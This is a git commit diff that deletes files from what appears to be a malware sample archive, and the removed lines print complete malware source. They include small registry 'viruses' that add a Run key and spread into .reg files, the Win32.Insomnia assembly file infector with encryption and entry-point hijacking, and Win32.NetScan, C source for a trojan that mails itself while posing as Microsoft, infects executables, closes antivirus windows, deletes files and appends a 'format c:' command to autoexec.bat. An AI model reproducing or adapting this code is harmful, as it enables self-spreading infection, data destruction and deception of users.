Removed samples outside of directories

This commit is contained in:
TheDuchy 2020-11-15 02:39:45 +01:00
parent ace9e7415a
commit f7725987ca
101 changed files with 0 additions and 2115 deletions

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -1,13 +0,0 @@
REGEDIT4
;;-------------------------------;;
;; ;;
;; AntiREG (The First REG Virus) ;;
;; Coded By Lys Kovick ;;
;; Special Thanks To Phage ;;
;; ;;
;;-------------------------------;;
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

View File

@ -1,24 +0,0 @@
REGEDIT 4
;; WinREG.Wow
;; written by SeCoNd PaRt To HeLl
;; for my Virus Database
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
;; Wow
;; WowWow
;; WowWowWow
;; WowWowWowWow
;; WowWowWowWowWow
;; WowWowWowWowWowWow
;; WowWowWowWowWowWowWow
;; WowWowWowWowWowWowWowWow
;; WowWowWowWowWowWowWow
;; WowWowWowWowWowWow
;; WowWowWowWowWow
;; WowWowWowWow
;; WowWowWow
;; WowWow
;; Wow

View File

@ -1,14 +0,0 @@
REGEDIT 4
;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- ***************
;;
;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
;;
;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
;; itself (the code in the registry) to these .REG-files.
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because it is too large Load Diff

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -1,468 +0,0 @@
; Win32.Insomnia (c) DR-EF.
;--------------------------------------------------
;virus name:Win32.Insomnia
;virus author:DR-EF
;virus size:1972 bytes
;features:
; o dont increase file size,overwrite reloc
; section instead.
; o use EPO - replace all mov eax,fs:[00000000]
; instructions with call virus decryptor.
; o encrypted with new key for each file.
; o use the dotdot method to find files.
;payload:messagebox with this text:
; ".:[Win32.Insomnia <20> 2004 DR-EF]:."
; every year at 29/12.
;compile:
; tasm32 /m3 /ml /zi Insomnia.asm , , ;
; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib
; pewrsec Insomnia.exe
;--------------------------------------------------
.386
.model flat
extrn ExitProcess:proc
virus_size equ (EndVirus-virus_start)
INVALID_HANDLE_VALUE equ -1
FILE_ATTRIBUTE_NORMAL equ 00000080h
OPEN_EXISTING equ 3
GENERIC_WRITE equ 40000000h
GENERIC_READ equ 80000000h
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
.data
db ?
.code
virus_start:
call Delta
Delta: pop ebp
sub ebp,offset Delta
mov ecx,NumberOfKernelBases
lea esi,[ebp + KernelBaseTable]
@next_k:lodsd
call GetKernel32Base
jc GetApis
loop @next_k
jmp reth ;return to host
KernelBaseTable:
dd 804d4000h ;winXP
dd 0bff60000h ;winME
dd 77f00000h ;winNT
dd 77e70000h ;win2K
dd 0bff70000h ;win9X
NumberOfKernelBases equ 5h
GetApis:mov eax,[ebp + kernel32base]
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[ebp + kernel32base]
;eax - kernel32 export table
push eax
xor edx,edx
mov eax,[eax + 20h]
add eax,[ebp + kernel32base]
mov edi,[eax]
add edi,[ebp + kernel32base]
;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax
;eax - kernel32 export table
;edx - GetProcAddress position
shl edx,1h
mov ebx,[eax + 24h]
add ebx,[ebp + kernel32base]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[ebp + kernel32base]
add ebx,edx
mov ebx,[ebx]
add ebx,[ebp + kernel32base]
mov [ebp + GetProcAddress],ebx
mov ecx,NumberOfApis
lea eax,[ebp + ApiNamesTable]
lea ebx,[ebp + ApiAddressTable]
nxt_api:push ecx
push eax
push eax
push [ebp + kernel32base]
call [ebp + GetProcAddress]
or eax,eax
je api_err
mov dword ptr [ebx],eax
pop eax
nxt_al: inc eax
cmp byte ptr [eax],0h
jne nxt_al
inc eax
add ebx,4h
pop ecx
loop nxt_api
jmp InfectFiles
api_err:add esp,8h
jmp reth
_GetProcAddress db "GetProcAddress",0
GetProcAddress dd 0
kernel32base dd 0
ApiNamesTable:
_FindFirstFile db "FindFirstFileA",0
_FindNextFile db "FindNextFileA",0
_GetCurrentDirectory db "GetCurrentDirectoryA",0
_SetCurrentDirectory db "SetCurrentDirectoryA",0
_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_GetLocalTime db "GetLocalTime",0
_LoadLibrary db "LoadLibraryA",0
_SetFileTime db "SetFileTime",0
ApiAddressTable:
FindFirstFile dd 0
FindNextFile dd 0
GetCurrentDirectory dd 0
SetCurrentDirectory dd 0
CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnmapViewOfFile dd 0
GetLocalTime dd 0
LoadLibrary dd 0
SetFileTime dd 0
NumberOfApis equ 12
GetKernel32Base:
pushad
lea ebx,[ebp + k32err]
push ebx
xor ebx,ebx
push dword ptr fs:[ebx]
mov fs:[ebx],esp
mov ebx,eax
cmp word ptr [eax],"ZM"
jne _k32err
add eax,[eax + 3ch]
cmp word ptr [eax],"EP"
jne _k32err
mov [ebp + kernel32base],ebx
pop dword ptr fs:[0]
add esp,4h
popad
stc
ret
_k32err:pop dword ptr fs:[0]
add esp,4h
popad
clc
ret
k32err: mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,4h
popad
clc
ret
VirusCopyRight db ".:[Win32.Insomnia <20> 2004 DR-EF]:.",0
InfectFiles:
mov [ebp + max_dirs],0fh
lea eax,[ebp + cdir]
push eax
push 0ffh
call [ebp + GetCurrentDirectory]
or eax,eax
je ReturnToHost
s_files:cmp [ebp + max_dirs],0h
je r_dir
lea eax,[ebp + WIN32_FIND_DATA]
push eax
lea eax,[ebp + search_mask]
push eax
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je nxt_dir
mov [ebp + hfind],eax
i_file: call InfectFile
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push [ebp + hfind]
call [ebp + FindNextFile]
or eax,eax
jne i_file
nxt_dir:dec [ebp + max_dirs]
lea eax,[ebp + dotdot]
push eax
call [ebp + SetCurrentDirectory]
or eax,eax
jne s_files
r_dir: lea eax,[ebp + cdir]
push eax
call [ebp + SetCurrentDirectory]
ReturnToHost:
;check for payload:
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime]
cmp word ptr [ebp + wMonth],0ch
jne reth
cmp word ptr [ebp + wDay],1dh
jne reth
lea eax,[ebp + user32dll]
push eax
call [ebp + LoadLibrary]
or eax,eax
je reth
lea ebx,[ebp + MessageBox]
push ebx
push eax
call [ebp + GetProcAddress]
or eax,eax
je reth
xor ecx,ecx
push MB_ICONINFORMATION or MB_SYSTEMMODAL
push ecx
lea ebx,[ebp + VirusCopyRight]
push ebx
push ecx
call eax
reth: popfd
popad
db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
ret
SYSTEMTIME:
wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
user32dll db "user32.dll",0
MessageBox db "MessageBoxA",0
MB_SYSTEMMODAL equ 00001000h
MB_ICONINFORMATION equ 00000040h
hfind dd 0
max_dirs db 0fh
search_mask db "*.exe",0
dotdot db "..",0
cdir db 0ffh dup(0)
WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0
ftLastAccessTime dq 0
ftLastWriteTime dq 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 0ffh dup (0)
cAlternateFileName db 20 dup (0)
InfectFile:
inc byte ptr [ebp + decrypt_key] ;create new key
lea ebx,[ebp + cFileName]
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push ebx
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitInfect
mov [ebp + hfile],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READWRITE
push eax
push [ebp + hfile]
call [ebp + CreateFileMapping]
or eax,eax
je close_f
mov [ebp + hmap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_WRITE
push [ebp + hmap]
call [ebp + MapViewOfFile]
or eax,eax
je close_m
mov [ebp + mapbase],eax
;check for valid pe file
cmp word ptr [eax],"ZM"
jne CloseFile
add eax,[eax + 3ch]
cmp word ptr [eax],"EP"
jne CloseFile
;goto sections table
mov cx,[eax + 6h] ; get number of sections
and ecx,0ffffh
mov ebx,[eax + 34h];get image base
mov dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor
mov ebx,[eax + 74h];get number of datadirectory
shl ebx,3h
add eax,ebx
add eax,78h
push eax ;eax - sections table
push ecx ;ecx - number of sections
;check for reloc section
@sec: cmp dword ptr [eax],"ler."
jne nxt_sec
cmp dword ptr [eax + 2h],"cole"
je f_rec
nxt_sec:add eax,28h
loop @sec
ext_rlc:add esp,8h ;restore stack
jmp CloseFile
;check if the reloc section is bigger than virus
f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header !
jb ext_rlc
;set new section flags
or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable
;goto the section raw data:
mov edx,[eax + 0ch]
mov eax,[eax + 14h]
add eax,[ebp + mapbase]
;overwrite the reloc section with the virus
mov edi,eax
lea esi,[ebp + virus_start]
mov ecx,virus_size
@enc: lodsb
xor al,byte ptr [ebp + decrypt_key]
stosb
loop @enc
pop ecx ;ecx - number of sections
pop ebx ;ebx - sections table
sub eax,[ebp + mapbase]
add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files
@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ?
je f_cod
cmp dword ptr [ebx + 1h],"edoc" ;code ?
je f_cod
cmp dword ptr [ebx],"EDOC" ;CODE ?
je f_cod
add ebx,28h
loop @sec2
add esp,4h ;restore stack
jmp CloseFile
;ebx - code section header
f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data
mov edx,[ebx + 8h] ;edx - virtual section size
sub ecx,edx
cmp ecx,DecryptorSize
ja write_d
add esp,4h
jmp CloseFile
write_d:mov edi,[ebx + 14h]
mov [ebp + virus_entry_point],edi
add [ebp + virus_entry_point],edx
add edi,[ebp + mapbase]
push edi ;save code section raw data
add edi,edx ;esi - where to write virus decryptor
lea esi,[ebp + VirusDecryptorStart]
mov ecx,DecryptorSize
rep movsb
pop esi ;esi - code section raw data
;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor
xchg edx,ecx ;ecx - code section virtual size
@1: cmp word ptr [esi],0a164h
jne nxt_w
cmp dword ptr [esi + 2],0
jne nxt_w
;esi - mov eax,fs:[00000000] location.
mov byte ptr [esi],90h ;nop
mov byte ptr [esi + 1h],0e8h;call
mov eax,[ebp + virus_entry_point]
mov ebx,esi
sub ebx,[ebp + mapbase]
sub eax,ebx
sub eax,6h
mov dword ptr [esi + 2h],eax
nxt_w: inc esi
loop @1
CloseFile:
push [ebp + mapbase]
call [ebp + UnmapViewOfFile]
close_m:push [ebp + hmap]
call [ebp + CloseHandle]
close_f:lea eax,[ebp + ftLastWriteTime]
push eax
lea eax,[ebp + ftLastAccessTime]
push eax
lea eax,[ebp + ftCreationTime]
push eax
push [ebp + hfile]
call [ebp + SetFileTime]
push [ebp + hfile]
call [ebp + CloseHandle]
ExitInfect:
ret
VirusDecryptorStart equ $
pushad
pushfd
mov esi,00000000
Virus_Start equ $-4
push esi
mov edi,esi
mov ecx,virus_size
@dcrypt:lodsb
xor al,5h
decrypt_key equ $-1
stosb
loop @dcrypt
ret
EndVirusDecryptor equ $
DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart)
hfile dd 0
hmap dd 0
mapbase dd 0
virus_entry_point dd 0
EndVirus equ $
First_Gen_Host:
push offset exit
pushfd
pushad
jmp virus_start
exit: push eax
call ExitProcess
end First_Gen_Host

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -1,245 +0,0 @@
#include "netscan.h"
#pragma hdrstop
#pragma warning (disable: 4068)
#pragma warning (disable: 4001)
#pragma resource "resource.res"
char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
LPSTR FileEmm386 = "Emm386.exe";
LPSTR FileSetver = "SetVer.exe";
LPSTR Nom = "a";
DWORD ExtInf;
int Err,ErrSend;
HANDLE NetScanTime,NetScanHandle,AutoBat;
HMODULE GetKernLib, GetMapiLib;
HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
typedef DWORD(*RegistServProcs)(DWORD,DWORD);
typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
typedef ULONG(*DoMemFree)(LPVOID);
HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
#pragma argsused
int APIENTRY WinMain
(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
//Win32.NetScan by ZeMacroKiller98
//Tous droits rservs (c) 2001
WIN32_FIND_DATA GetFileToInfect;
OSVERSIONINFO GetOsVer;
FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
SYSTEMTIME TriggerScanTime;
RegistServProcs MyServProcs;
SendMessInfect SendMessToOther;
FindUserAddress GetAddressUser;
DoMemFree GetMemFree;
GetKernLib = LoadLibrary("kernel32.dll");
MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
GetVersionEx(&GetOsVer);
if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
RegCloseKey(NetScanNTKey);
}
else
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
RegCloseKey(NetScan32Key);
}
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
{
GetMapiLib = LoadLibrary("mapi32.dll");
GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
SetCurrentDirectory(GetNetScanWinDir);
NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
NetScanFind:
NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
CloseHandle(NetScanTime);
if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
goto NotInfection;
CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
CloseHandle(NetScanTime);
NotInfection:
if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
goto NetScanFind;
FindClose(NetScanHandle);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
RegCloseKey(CreateNetScan);
SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
{
MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
SetCurrentDirectory("C:/");
DeleteFile("*.*");
ExitProcess(0);
}
MapiMessage stMessage;
MapiRecipDesc stRecip;
MapiFileDesc stFile;
lpMapiRecipDesc lpRecip;
stFile.ulReserved = 0;
stFile.flFlags = 0L;
stFile.nPosition = (ULONG)-1;
stFile.lpszPathName = GetNetScanPath;
stFile.lpszFileName = NULL;
stFile.lpFileType = NULL;
MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
UnResolve:
Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
if(Err!=SUCCESS_SUCCESS)
{
switch(Err){
case MAPI_E_AMBIGUOUS_RECIPIENT:
MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_UNKNOWN_RECIPIENT:
MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
break;
case MAPI_E_FAILURE:
MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_INSUFFICIENT_MEMORY:
MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_NOT_SUPPORTED:
MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
case MAPI_E_USER_ABORT:
MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
break;
}
goto UnResolve;
}
stRecip.ulReserved = lpRecip->ulReserved;
stRecip.ulRecipClass = MAPI_TO;
stRecip.lpszName = lpRecip->lpszName;
stRecip.lpszAddress = lpRecip->lpszAddress;
stRecip.ulEIDSize = lpRecip->ulEIDSize;
stRecip.lpEntryID = lpRecip->lpEntryID;
stMessage.ulReserved = 0;
stMessage.lpszSubject = "Microsoft NetScan Utility";
stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
stMessage.lpszMessageType = NULL;
stMessage.lpszDateReceived = NULL;
stMessage.lpszConversationID = NULL;
stMessage.flFlags = 0L;
stMessage.lpOriginator = NULL;
stMessage.nRecipCount = 1;
stMessage.lpRecips = &stRecip;
stMessage.nFileCount = 1;
stMessage.lpFiles = &stFile;
ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
if(ErrSend!=SUCCESS_SUCCESS)
{
MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DeleteFile("*.*");
ExitProcess(0);
}
MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
"NetScan Utility",
MB_OK|MB_ICONINFORMATION);
FreeLibrary(GetMapiLib);
}
RegCloseKey(NetScanInstall);
STARTUPINFO NetScanInfo;
PROCESS_INFORMATION NetScanProc;
NetScanInfo.cb = sizeof(STARTUPINFO);
NetScanInfo.lpReserved = NULL;
NetScanInfo.lpReserved2 = NULL;
NetScanInfo.cbReserved2 = 0;
NetScanInfo.lpDesktop = NULL;
NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
if(CreateProcess(GetNetScanPath,
NULL,
(LPSECURITY_ATTRIBUTES)NULL,
(LPSECURITY_ATTRIBUTES)NULL,
FALSE,
0,
NULL,
NULL,
&NetScanInfo,
&NetScanProc))
{
CloseHandle(NetScanProc.hProcess);
CloseHandle(NetScanProc.hThread);
}
if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
ExitProcess(0);
SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
MyServProcs(NetScanProc.dwProcessId,1);
GetSystemTime(&TriggerScanTime);
//Close windows which title is WINDOWS
WindowsHwnd = FindWindow(NULL,"WINDOWS");
if(WindowsHwnd!=NULL)
DestroyWindow(WindowsHwnd);
//Close access to Symantec HomePage
SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
if(SymantecHwnd!=NULL)
{
MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
DestroyWindow(SymantecHwnd);
}
//Anti Norton Antivirus
NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
if(NAVHwnd !=NULL)
{
MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
DestroyWindow(NAVHwnd);
}
if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
{
mciSendString("open cdaudio",NULL,0,NULL);
mciSendString("set cdaudio door open",NULL,0,NULL);
mciSendString("close cdaudio",NULL,0,NULL);
mciSendString("open cdaudio",NULL,0,NULL);
mciSendString("set cdaudio audio all off",NULL,0,NULL);
mciSendString("close cdaudio",NULL,0,NULL);
MessageBeep(MB_ICONEXCLAMATION);
}
if(TriggerScanTime.wDay==1)
{
MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
SetCurrentDirectory("C:\\");
AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
CloseHandle(AutoBat);
ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
}
FreeLibrary(GetKernLib);
return 0;
}
*************************************************************************
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <dos.h>
#include <stdlib.h>
#include <stdio.h>
#include <mapi.h>
#include <mmsystem.h>

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More